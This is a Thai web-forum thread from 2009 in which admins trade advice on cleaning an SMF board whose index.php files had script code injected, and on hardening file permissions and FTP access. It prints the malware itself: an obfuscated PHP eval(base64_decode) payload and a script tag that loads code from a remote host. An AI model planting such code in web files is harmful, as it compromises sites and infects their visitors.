:: กติกา มารยาท ในการใช้งานเว็บบอร์ด ::กรุณากรอกอีเมล์จริงในการสมัคร และรับอีเมล์ยืนยันเพื่อใช้งานในบอร์ด
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
อ้างจาก: TANA ที่ 17, มีนาคม 2009, 09:10:16 PMใช่ครับโดนไวรัส โซนไอทีก็เคยเจอhttp://svz.in.th/node/virus-in-zone-it.htmlครับ แล้วไม่ทราบว่ามีวิธีีแก้ไขหรือป้องกันยังไงครับ ผมเพิ่งเข้าไปลบสคริปท์มันออกไป (ลบด้วยมือ) ทุกไฟล์ index และเซ็ท chmod เป็น 644 ส่วนโฟลเดอร์เป็น 755 และรีเซ็ท pass เข้า FTP ใหม่ น่าจะพอเพียงรึยังครับเนี่ย
ใช่ครับโดนไวรัส โซนไอทีก็เคยเจอhttp://svz.in.th/node/virus-in-zone-it.html
อ้างจาก: tendo ที่ 17, มีนาคม 2009, 03:05:03 PMแก้ได้แล้วครับ ผมเจอโค้ด html แทรกในบรรทัดสุดท้ายในไฟล์ index.php ทุกหน้า ไม่รู้มันมาได้ยังไง พอลบออกก็หายแล้วครับสแปม.. เอชทีเอ็มแอล การทำงาน มันจะแทรกโค๊ด ไอเฟรม.. เข้าไปในทุกไฟล์ที่เป็นอินเด็กผลกระทบ แอนติไวรัสจะมองว่าไฟล์เหล่านั้นคือโทรจัน แก้ปัญหา- ลบด้วยมือ ทุกไฟล์ที่มีคำว่าอินเด็ก- รันสคริปพีเอชพี ลบบรรทัดนี้ออก (อันนี้ทำไม่เป็นการป้องกันไม่เซ็ต 777
แก้ได้แล้วครับ ผมเจอโค้ด html แทรกในบรรทัดสุดท้ายในไฟล์ index.php ทุกหน้า ไม่รู้มันมาได้ยังไง พอลบออกก็หายแล้วครับ
สแปมกากพวกนี้ทำงานคล้ายกัน กินไฟล์เซ็ตติ้งมั่ง กินไฟล์อินเด็กมั่งอยู่ที่เราผู้ดูแลเว็บจะรอบคอบไหมบางคน chmod 777 จนเคยชิน หรือเปลี่ยน 777 เพื่อให้ทำงานง่ายขึ้นแต่ดันลืมเปลี่ยนกลับ พอโดนสแปมทีก็อ้วกเลยอย่าง เอสเอ็มเอฟ นึกดูว่ามีไฟล์อินเด็กกี่ไฟล์ .. แทบจะทุกโฟลเดอร์ นั่งลบ นั่งอัพ ใช้เวลาเป็นชั่วโมง ดังนั้นการเปอร์มิสชั่น chmod จึงสำคัญRead อ่าน Write เขียน Execute ประมวลผล ถ้า 777 ก็จะหมายถึง ใครก็ได้จากไหนก็ได้ อ่านเว็บเราได้ เขียนไฟล์ทับหรืออัพได้ ประมวลผลไฟล์ต่างๆได้
อ้างจาก: คนหลงทาง ที่ 18, มีนาคม 2009, 07:58:35 PM ข้อสังเกตุอีกข้อ 1 คือ โดน SPAM HTML แล้วสำหรับบร์อด smf จะกดแสดงตัวอย่างไม่ได้ justusers.net/forum/index.php?topic=2633.0ปัญหาอีกอย่างคือ ถ้า โดน SPAM HTML แล้ว ตัวสะแกนของคนที่เข้าประจำจะไม่แสดงเลยจริงหรือเปล่า 1. ไม่เคยสังเกตุเหมือนกันว่าเว็บที่โดนจะมีอาการพิเศษแบบไม่แสดงตัวอย่างไหม ต้องลองเว็บของคนอื่นๆที่โดนเข้าไปว่ามีอาการคล้ายของท่านเทนโด ตามกระทู้ 2633.0 หรือไม่หรืออีกอย่าง เอาโค๊ดไปแปะเว็บตัวเองแล้วลองเลย 555+ (อันนี้อย่าทำดีกว่า)2.ตัวสะแกนของคนที่เข้าประจำจะไม่แสดงเลย ** ไม่ใช่แน่นอน ถ้าแอนติไวรัสยังสุขภาพดีอยู่ เข้าแล้วมันต้องเด้งแน่นอนทั้งแอนติไวรัส แอนติสปายแวร์เด้งหมดแหละ อีกอย่างคือไม่รู้ว่ามันมีการส่งสคริปออกไปไหม หรือส่งเมล์หรือเปล่า ถ้ามันมีการส่ง เดี๋ยวทางโฮสต์อาจจะส่ง จดหมายรัก มาหาเราได้
ข้อสังเกตุอีกข้อ 1 คือ โดน SPAM HTML แล้วสำหรับบร์อด smf จะกดแสดงตัวอย่างไม่ได้ justusers.net/forum/index.php?topic=2633.0ปัญหาอีกอย่างคือ ถ้า โดน SPAM HTML แล้ว ตัวสะแกนของคนที่เข้าประจำจะไม่แสดงเลยจริงหรือเปล่า
โทรจันมาจากไหนมาจากการอัพไฟล์ที่มีโทรจันขึ้นโฮสต์ โดยอาจจะรู้เท่าไม่ถึงการณ์ เพราะฉะนั้นการให้สิทธิ์ใช้งานเอฟทีพี ควรพิจารณาให้ดีว่าจะให้ใครใช้ได้บ้างและไฟล์ธีมแปลกๆ หรือไฟล์ที่ไม่รู้จัก -ซอฟแวร์-คีเจน ไม่ควรอัพขึ้นโฮสต์ เพราะนั่นจะเป็นต้นเหตุของสคริปแทรกพวกนี้
จะ777 ทั้งบอร์ดก็ได้ แต่ทำเสร็จแล้วก็ต้องกลับคืน 755 ไม่งั้นเสร็จได้ง่ายๆ หรือไม่อีกวิธีคือ ก่อนลงเราก็ดูซะก่อนว่ามันต้องใช้ไดเรคทอรี่ไหนบ้าง ก็ทำเฉพาะที่จำเป็นให้เป็น 777เสร็จแล้วค่อยปรับคืน แต่ก็ยังมีบางโฟลเดอร์ที่ทำเสริม จำเป็นต้อง 777 ไว้ตลอด อย่างโฟลเดอร์อัพโหลด หรือแชท สำหรับ เอสเอ็มเอฟ การ 777 ทั้งบอร์ดก็แน่นอนว่าโดนสคริปไฟล์เอชทีเอ็มแอลแน่นอน ซีเอ็มเอสอย่างอื่นก็เหมือนกัน นุ๊ก แมมโบ จุมลา ขืน 777 ก็โดนแฮ็คทั้งนั้นเวิดเพรส 777 ทิ้งไว้ บทความบล็อกที่เขียนมีสิทธิ์หายเกลี้ยง
eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygneHJndycpKXtmdW5jdGlvbiB4cmd3KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14 XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk I2lzJywkcywkYSkpZ?php
<script src=http://forums.indianmoneyplus.com/cgi-bin/profile-edit.php ></script>
ผมก็เคยเจอปัญหานี้เหมือนกันจนพบว่ามันมาจาก ftp ผมเลยเลิกใช้และใช้การ brows file ด้วย Control ของ host ซึ่งจะปลอดภัยกว่าครับ
ตกลงมันติดผ่าน ftp หรือติดจากไวรัสที่ฝังเครื่อง ...
เว็บไซต์ ..จัส - พิมพ์ชื่อลิ้งค์ไม่ได้ - ... ถูกรายงานว่าเป็นเว็บอันตรายและถูกปิดกั้นตามค่าปรับแต่งด้านความปลอดภัยของคุณ
เวลาคนเข้ามาดูบอร์ดและมีไวรัสอยู่ในเครื่อง อยู่แล้ว มีไวรัสมีโอกาสเข้าสู่เวปที่เรากำลังดูอยู่หรือเปล่า ปัญหาคาใจ
มันจะมีผลกับคนที่ใช้รหัสเอฟทีพีเท่านั้นแหละ ...